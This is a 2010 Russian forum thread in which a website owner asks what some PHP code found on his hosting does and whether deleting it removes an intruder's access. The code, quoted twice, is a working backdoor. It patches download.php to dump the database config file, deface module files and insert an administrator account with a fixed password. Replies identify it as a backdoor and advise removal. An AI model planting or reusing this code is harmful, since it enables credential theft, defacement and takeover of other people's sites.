X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Shell
fedek
fedek
Topic Starter сообщение 31.5.2010, 17:17; Ответить: fedek
Сообщение #1


Есть файл, в котором Находится как я понимаю Shell
}

if($_GET['abc']){
$ko = '
if ($_GET[\'abc\']) {echo file_get_contents(\'data/dbconfig.php\');}
if ($_GET[\'drop\']) {$fp = fopen(\'modules/domain_check2.php\',\'w\'); fwrite($fp,\'<? echo"<h1>FUCK YOU</h1>"; ?>\'); fclose($fp); $fp = fopen(\'modules/domain_check.php\',\'w\'); fwrite($fp,\'<? echo"<h1>FUCK YOU</h1>"; ?>\'); fclose($fp);}
if ($_GET[\'sql\']) {$db->query( "INSERT INTO " . PREFIX . "_users (email, password, name, user_group) VALUES (\'admin@admin.ru\', \'".md5(\'000000\')."\', \'Support\', \'1\')" );}
';
$sf = str_replace('<?php',"<?\n".$ko,file_get_contents(ENGINE_DIR.'/download.php'));
$fp = fopen(ENGINE_DIR.'/download.php','w'); fwrite($fp,$sf); fclose($fp);
}

С помощью него человек получает доступ к этому фалу или ко всем данным у меня на хостинге? И если стереть эту часть кода, закроется ли доступ данному человеку к данному файлу и хостингу?

P.S. отвечать строго по теме, не кого не обсуждая!

Сообщение отредактировал fedek - 31.5.2010, 17:18


--------------------
-1
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
777374
777374
сообщение 31.5.2010, 17:24; Ответить: 777374
Сообщение #2


(fedek @ 31.5.2010, 17:17) *
Есть файл, в котором Находится как я понимаю Shell
}

if($_GET['abc']){
$ko = '
if ($_GET[\'abc\']) {echo file_get_contents(\'data/dbconfig.php\');}
if ($_GET[\'drop\']) {$fp = fopen(\'modules/domain_check2.php\',\'w\'); fwrite($fp,\'<? echo"<h1>FUCK YOU</h1>"; ?>\'); fclose($fp); $fp = fopen(\'modules/domain_check.php\',\'w\'); fwrite($fp,\'<? echo"<h1>FUCK YOU</h1>"; ?>\'); fclose($fp);}
if ($_GET[\'sql\']) {$db->query( "INSERT INTO " . PREFIX . "_users (email, password, name, user_group) VALUES (\'admin@admin.ru\', \'".md5(\'000000\')."\', \'Support\', \'1\')" );}
';
$sf = str_replace('<?php',"<?\n".$ko,file_get_contents(ENGINE_DIR.'/download.php'));
$fp = fopen(ENGINE_DIR.'/download.php','w'); fwrite($fp,$sf); fclose($fp);
}

С помощью него человек получает доступ к этому фалу или ко всем данным у меня на хостинге? И если стереть эту часть кода, закроется ли доступ данному человеку к данному файлу и хостингу?

P.S. отвечать строго по теме, не кого не обсуждая!


этот код делает листинг data/dbconfig.php... etc..
кароч админа ставит в бд mysql


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fedek
fedek
Topic Starter сообщение 31.5.2010, 17:26; Ответить: fedek
Сообщение #3


этот код делает листинг data/dbconfig.php... etc..
кароч админа ставит в бд mysql

С помощью этого кода кто-то может получить доступ к моим данным(хостингу, БД, К данному файлу)?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
777374
777374
сообщение 31.5.2010, 17:30; Ответить: 777374
Сообщение #4


(fedek @ 31.5.2010, 17:26) *
С помощью этого кода кто-то может получить доступ к моим данным(хостингу, БД, К данному файлу)?

DB Only! и некоторым файлам


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fedek
fedek
Topic Starter сообщение 31.5.2010, 17:34; Ответить: fedek
Сообщение #5


DB Only! и некоторым файлам

Тоесть если я сотру данный код, то злоумышленник не получит доступ к данному файлу и базе данных?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 31.5.2010, 19:37; Ответить: Electric
Сообщение #6


(fedek @ 31.5.2010, 16:34) *
Тоесть если я сотру данный код, то злоумышленник не получит доступ к данному файлу и базе данных?
Да, но не фак что уже не получили доступ. Кстати это не шелл это бекдор.
Одного не пойму, зачем плодить темы?
http://talk.maulnet.ru/index.php?showtopic=56429


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fedek
fedek
Topic Starter сообщение 31.5.2010, 21:03; Ответить: fedek
Сообщение #7


Одного не пойму, зачем плодить темы?

Инет лагнул видимо... Можете посмотреть, темы в одно и тоже время созданы...

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Фотография DF Perl Informer - бесплатный скрипт для тестирования хостинга, web-shell
0 DFService 1286 7.7.2020, 14:30
автор: DFService


 



RSS Текстовая версия Сейчас: 29.3.2024, 0:53
Дизайн